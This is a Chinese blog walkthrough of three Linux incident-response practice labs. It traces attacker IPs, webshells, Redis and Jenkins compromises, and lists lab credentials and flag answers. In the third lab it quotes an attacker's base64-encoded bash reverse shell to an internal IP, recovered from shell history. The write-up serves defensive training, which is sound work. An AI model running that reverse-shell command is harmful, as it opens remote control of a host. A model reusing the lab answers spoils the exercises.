当前位置: 首页 > news >正文

靶机应急 | 知攻善防----Linux

  • 靶场下载地址:https://mp.weixin.qq.com/s/opj5dJK7htdawkmLbsSJiQ

  • Linux应急靶场-linux1

  • 前景:

    • 小王急匆匆地找到小张,小王说"李哥,我dev服务器被黑了",快救救我!!
  • 题目:

    • 1、黑客的IP地址
    • 2、遗留下的三个flag
  • 账号-密码:defend/defend root/defend
  • 第一个flag:

    • 首先我们登录系统后,发现是一个Centos系统
    • 查看当前用户是否拥有SUDO权限--sudo -l

    • 可以看到能执行任何命令,我们切换root用户,su -
    • 查看操作历史找到第一个flag:flag{thisismybaby}

  • 第二个flag:

    • 同时也发现攻击者修改了rc.local文件,去查看一下
    • cat /etc/rc.d/rc.local,找到第二个flag--flag{kfcvme50}

  • 第三个flag:

    • 查看用户信息--less /etc/passwd。发现存在redis用户

    • 有一个公钥,但是没有看到flag
      • cd /root/.ssh
      • ls -a
      • cat authorized_keys
    • 倒是看到了攻击者的名称

    • 查看redis的配置文件--cat /etc/redis.conf。在开头找到第三个flag:flag{P@ssW0rd_redis}

  • 攻击者IP:

    • 查看redis的日志信息(redis服务器的日志保存位置为/var/log/redis/redis.log)
    • 在里面找到了攻击者的IP--192.168.75.129

    • linux1-结束!!!
  • Linux应急靶场-linux2

  • 前景:

    • 看监控的时候发现webshell告警,领导让你上机检查你可以救救安服仔吗!!
  • 题目:

    • 1、提交攻击者IP
    • 2、提交攻击者修改的管理员密码(明文)
    • 3、提交第一次Webshell的连接URL(http://xxx.xxx.xxx.xx/abcdefg?abcdefg只需要提交abcdefg?abcdefg)
    • 4、提交Webshell连接密码
    • 5、提交数据包的flag1
    • 6、提交攻击者使用的后续上传的木马文件名称
    • 7、提交攻击者隐藏的flag2
    • 8、提交攻击者隐藏的flag3
  • 账号-密码:root/Inch@957821.
  • 提交攻击者IP:

    • 打开靶机,登录后发现有流量包。

    • 关闭防火墙--systemctl stop firewalld,使用Xshell进行SSH连接--账号-密码:root/Inch@957821.
    • 将流量包下载到本地进行分析
    • 打开后在搜索框输入http

    • 看流量包,源IP为192.168.20.1,目的是192.168.20.144。是192.168.20.1 向192.168.20.144发送POST请求,而192.168.20.144则是响应请求。

    • 统计一下最近登录的IP--grep "Accepted" /var/log/secure* | awk '{print $1.$2,$3,$9,$11}'

    • 确定攻击者IP为--192.168.20.1
  • 提交第一次Webshell的连接URL(http://xxx.xxx.xxx.xx/abcdefg?abcdefg只需要提交abcdefg?abcdefg)&提交Webshell连接密码:

    • 在流量包中筛选192.168.20.1的流量--http and ip.src==192.168.20.1

    • 右键查看HTTP查看,就会有所发现

    • 使用的连接工具为蚁剑,并且密码是--Network2020。存在的漏洞路径为--/index.php?user-app-register
  • 提交攻击者使用的后续上传的木马文件名称:

    • 发现上传的文件名称为version2.php

    • 继续找发现了明显的冰蝎php webshell特征

    • 在24流中发现目录信息,判断shell.php和version2.php谁先上传的(1、数据流越大越晚 2、根据目录信息和version2.php(换成北京时间)上传的信息对比时间)

    • 所以后续上传的木马文件名称为--version2.php
  • 三个flag:

    • 继续寻找数据流,在20时发现flag1--flag1{Network@_2020_Hack}

    • 查看历史发现,修改过者两个文件

    • 通过history命令,发现攻击者在环境变量中写入了第三个flag3,并且攻击者在/www/wwwroot/127.0.0.1/中创建了文件夹.api隐藏文件,然后复制了api下的文件,并修改了其中的两个文件。查看一下。
    • 也可以直接看到flag3--flag3{5LourqoFt5d2zyOVUoVPJbOmeVmoKgcy6OZ}
    • 查看两个文件的位置

      • find / -name mpnotify.* 2>/dev/null
      • find / -name alinotify.* 2>/dev/null
    • 查看攻击者创建的文件--cat /www/wwwroot/127.0.0.1/.api/alinotify.php
    • 找到flag2--flag2 = "flag{bL5Frin6JVwVw7tJBdqXlHCMVpAenXI9In9}"

  • 提交攻击者修改的管理员密码(明文):

    • 查看端口服务--netstat -antlp
    • 查看是否有可疑进程--top
    • Web 攻击 payload 排查,发现访问过PhpMyAdmin

    • 发现运行着BT

    • 输入bt,编号14,找到地址信息

    • 但是不知道密码需要修改密码,输入5编号

    • 将密码设置为123456。访问页面进行登录
    • 登录后点击数据库,得到登录账号和密码

    • 登录PhpMyAdmin

    • 查询数据库kaoshi,在第二页找到 x2_user 表

    • 进行MD5解密https://www.somd5.com/?action=getpwd

    • Linux2-结束!!!
  • Linux应急靶场-easy溯源

  • 前景:

    • 小张是个刚入门的程序猿,在公司开发产品的时候突然被叫去应急,小张心想"早知道简历上不写会应急了",于是call了运维小王的电话,小王说"你面试的时候不是说会应急吗?伪造简历吗?真该死。"
  • 题目:

    • 1、攻击者内网跳板机IP地址
    • 2、攻击者服务器地址
    • 3、存在漏洞的服务(提示:7个字符)
    • 4、攻击者留下的flag(格式zgsf{})
    • 5、攻击者邮箱地址
    • 6、攻击者的ID名称
  • 账号-密码:zgsfsys/zgsfsys(root用户也是这个密码)
  • 攻击者内网跳板机IP地址:

    • 打开终端查看历史命令--history

    • 看到命令--println "echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjExLjEyOS8xMjM0IDA+JjE= | base64 --decode | bash ".execute().text
    • 解码base64编码的数据--YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjExLjEyOS8xMjM0IDA+JjE=

    • 攻击者内网跳板机IP地址--192.168.11.129
  • 攻击者服务器地址:

    • 用户提权sudo -i到root,输入zgsfsys
    • 进入到chuantou,执行ls。发现frpc

    • 查看配置文件--cat frpc.toml

    • 攻击者服务器地址--156.66.33.66
  • 存在漏洞的服务(提示:7个字符)&攻击者留下的flag(格式zgsf{})

    • 打开桌面上的txt文件

    • 三个网站是bt、程序员小破绽、论坛
    • 查看流量器记录发现Jenkins的网站,并且找到了flag--zgsf{gongzhonghaozhigongshanfangshiyanshi}

    • flag在这那有漏洞的服务就为--Jenkins(7个字符)
  • 后续的溯源因为github上的厂库被删了所以也无法溯源
  • easy溯源-结束!!!
http://www.jsqmd.com/news/848336/

相关文章:

  • 终极ThinkPad风扇控制指南:用TPFanCtrl2告别噪音与过热烦恼
  • D2DX:让《暗黑破坏神2》在2026年重获新生的终极现代化改造方案
  • 从零开发游戏需要学习的c#模块,第十五章(一个完整的可以运行的小游戏)
  • 别再手动改PPT了!用Python-pptx库批量生成100份奖状/证书(附完整代码)
  • RTX166实时操作系统初始化与配置实战指南
  • 2026 年 30 个 MCP Server 实测评:Claude Code 集成效果与响应延迟对比数据
  • 潍坊漆面车衣怎么选才合适?
  • 如何利用SOLIDWORKS成形工具简化钣金设计流程
  • 收藏!6种低门槛AI副业,小白也能靠AI月入过万,别错过!
  • AI API 接入实践:从直接调用到统一网关管理的一次整理
  • 百考通助你站在学术前沿,自信开题 ��
  • Sub-agent 协同失效的 3 类边界场景:Claude Code 8.1 机制原理解析
  • idea快速添加测试类——实操
  • 2026年五金配件采购新趋势:为何融创五金制品有限公司成为优选伙伴? - 2026年企业推荐榜
  • 免费开源AMD Ryzen调试神器:ZenStatesDebugTool完整使用指南
  • 武汉假发店TOP5评测|揭秘江城最靠谱假发品牌,打造自然蓬松发型! - 行业深度观察C
  • linux lsmem
  • 2026深圳仿木栏杆优质服务商推荐榜:tcp塑石、人造假山、人造溶洞、仿真假山、仿真大树、仿真树、仿真溶洞、假树选择指南 - 优质品牌商家
  • 告别Telnet和Jmeter!用Apifox 2.3.24一站式搞定Dubbo 3.x接口调试(附Nacos注册中心实战)
  • 英语单词发音MP3音频下载:一键获取119,376个标准发音的终极解决方案
  • 2026年水平生命线怎么选:水平生命线国标、水平生命线标准、钢缆垂直生命线系统、钢缆水平生命线系统、国标垂直生命线选择指南 - 优质品牌商家
  • Path of Building装备制作终极指南:从混沌石到毕业装
  • 2026年浮筒吹塑机技术选型:玩具吹塑机/同发吹塑机/吹塑机价格/吹塑机加工/吹塑机厂/塑料吹塑机/护栏吹塑机/选择指南 - 优质品牌商家
  • 中兴光猫深度管理终极指南:一键开启工厂模式与永久Telnet服务
  • 2026年万通板生产企业排行:中空板周转箱、塑料中空板、万通板、防静电中空板、瓦楞板、PP中空板、中空板选择指南 - 优质品牌商家
  • 2026工业脱盐水技术干货:蒸馏水价格/蒸馏水生产/除盐水/医用蒸馏水/去离子水批发/工业去离子水采购/工业纯水/选择指南 - 优质品牌商家
  • 2026年至今,杭州干燥机备品备件可靠供应商深度解析:日盛工业的硬实力与服务保障 - 2026年企业推荐榜
  • 从Multisim仿真到面包板实测:手把手教你验证戴维宁等效电路的正确性
  • 在 OpenClaw 项目中配置 Taotoken 作为 Agent 任务执行后端
  • 如何在 RabbitMQ 中配置镜像队列实现高可用